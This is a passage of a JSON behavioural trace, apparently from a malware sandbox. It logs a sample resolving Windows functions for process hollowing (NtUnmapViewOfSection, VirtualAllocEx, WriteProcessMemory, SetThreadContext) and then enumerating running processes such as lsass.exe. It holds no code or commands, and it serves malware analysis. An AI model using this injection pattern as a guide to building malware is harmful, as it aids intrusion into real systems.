true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 839 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407878", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 840 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040787b", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 841 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040788c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 842 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040788f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateToolhelp32Snapshot" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a30" } ], "repeated": 0, "id": 843 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078a3", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 844 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078a6", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758791e0" } ], "repeated": 0, "id": 845 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ba", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 846 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078bd", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877950" } ], "repeated": 0, "id": 847 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ce", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 848 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078d1", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcbd0" } ], "repeated": 0, "id": 849 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078e5", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 850 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078e8", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcd70" } ], "repeated": 0, "id": 851 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078fc", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 852 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004078ff", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 853 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407913", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 854 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407916", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 855 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407927", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 856 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040792a", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtUnmapViewOfSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c3480" } ], "repeated": 0, "id": 857 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040793e", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 858 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407941", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAllocEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897390" } ], "repeated": 0, "id": 859 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407955", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 860 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407958", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758975e0" } ], "repeated": 0, "id": 861 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040796c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 862 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040796f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895c70" } ], "repeated": 0, "id": 863 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407983", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 864 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407986", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758970c0" } ], "repeated": 0, "id": 865 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407994", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 866 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407997", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResumeThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881b90" } ], "repeated": 0, "id": 867 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079ab", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 868 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079ae", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SuspendThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897230" } ], "repeated": 0, "id": 869 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079c2", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 870 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079c5", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TerminateProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879910" } ], "repeated": 0, "id": 871 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079d9", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 872 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079dc", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 873 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079f3", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 874 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004079f6", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtReadVirtualMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c35d0" } ], "repeated": 0, "id": 875 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a0a", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 876 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a0d", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsWow64Process" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880980" } ], "repeated": 0, "id": 877 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a21", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 878 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a24", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808d0" } ], "repeated": 0, "id": 879 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a32", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 880 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a35", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DuplicateHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883160" } ], "repeated": 0, "id": 881 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "psapi.dll" }, { "name": "BaseAddress", "value": "0x76280000" } ], "repeated": 0, "id": 882 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a48", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "psapi.dll" }, { "name": "ModuleHandle", "value": "0x76280000" }, { "name": "FunctionName", "value": "GetProcessMemoryInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76281480" } ], "repeated": 0, "id": 883 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a58", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 884 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a5b", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882010" } ], "repeated": 0, "id": 885 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a6e", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 886 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407a71", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 887 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408d78", "parentcaller": "0x00409be6", "category": "process", "api": "CreateToolhelp32Snapshot", "status": true, "return": "0x000002d4", "arguments": [ { "name": "Flags", "value": "0x00000002", "pretty_value": "TH32CS_SNAPPROCESS" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 888 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408de2", "parentcaller": "0x00409be6", "category": "process", "api": "Process32FirstW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "[System Process]" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 889 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408df3", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "System" }, { "name": "ProcessId", "value": "4" } ], "repeated": 0, "id": 890 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "Registry" }, { "name": "ProcessId", "value": "92" } ], "repeated": 0, "id": 891 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "smss.exe" }, { "name": "ProcessId", "value": "336" } ], "repeated": 0, "id": 892 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "csrss.exe" }, { "name": "ProcessId", "value": "436" } ], "repeated": 0, "id": 893 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "wininit.exe" }, { "name": "ProcessId", "value": "512" } ], "repeated": 0, "id": 894 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "csrss.exe" }, { "name": "ProcessId", "value": "520" } ], "repeated": 0, "id": 895 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "winlogon.exe" }, { "name": "ProcessId", "value": "604" } ], "repeated": 0, "id": 896 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "services.exe" }, { "name": "ProcessId", "value": "648" } ], "repeated": 0, "id": 897 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "lsass.exe" }, { "name": "ProcessId", "value": "672" } ], "repeated": 0, "id": 898 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "768" } ], "repeated": 0, "id": 899 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "fontdrvhost.exe" }, { "name": "ProcessId", "value": "780" } ], "repeated": 0, "id": 900 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "fontdrvhost.exe" }, { "name": "ProcessId", "value": "788" } ], "repeated": 0, "id": 901 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "892" } ], "repeated": 0, "id": 902 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "940" } ], "repeated": 0, "id": 903 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "460" } ], "repeated": 0, "id": 904 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "524" } ], "repeated": 0, "id": 905 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "712" } ], "repeated": 0, "id": 906 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "dwm.exe" }, { "name": "ProcessId", "value": "600" } ], "repeated": 0, "id": 907 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1084" } ], "repeated": 0, "id": 908 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1128" } ], "repeated": 0, "id": 909 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1164" } ], "repeated": 0, "id": 910 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1272" } ], "repeated": 0, "id": 911 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1328" } ], "repeated": 0, "id": 912 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1340" } ], "repeated": 0, "id": 913 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1488" } ], "repeated": 0, "id": 914 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1512" } ], "repeated": 0, "id": 915 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1540" } ], "repeated": 0, "id": 916 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1556" } ], "repeated": 0, "id": 917 }, { 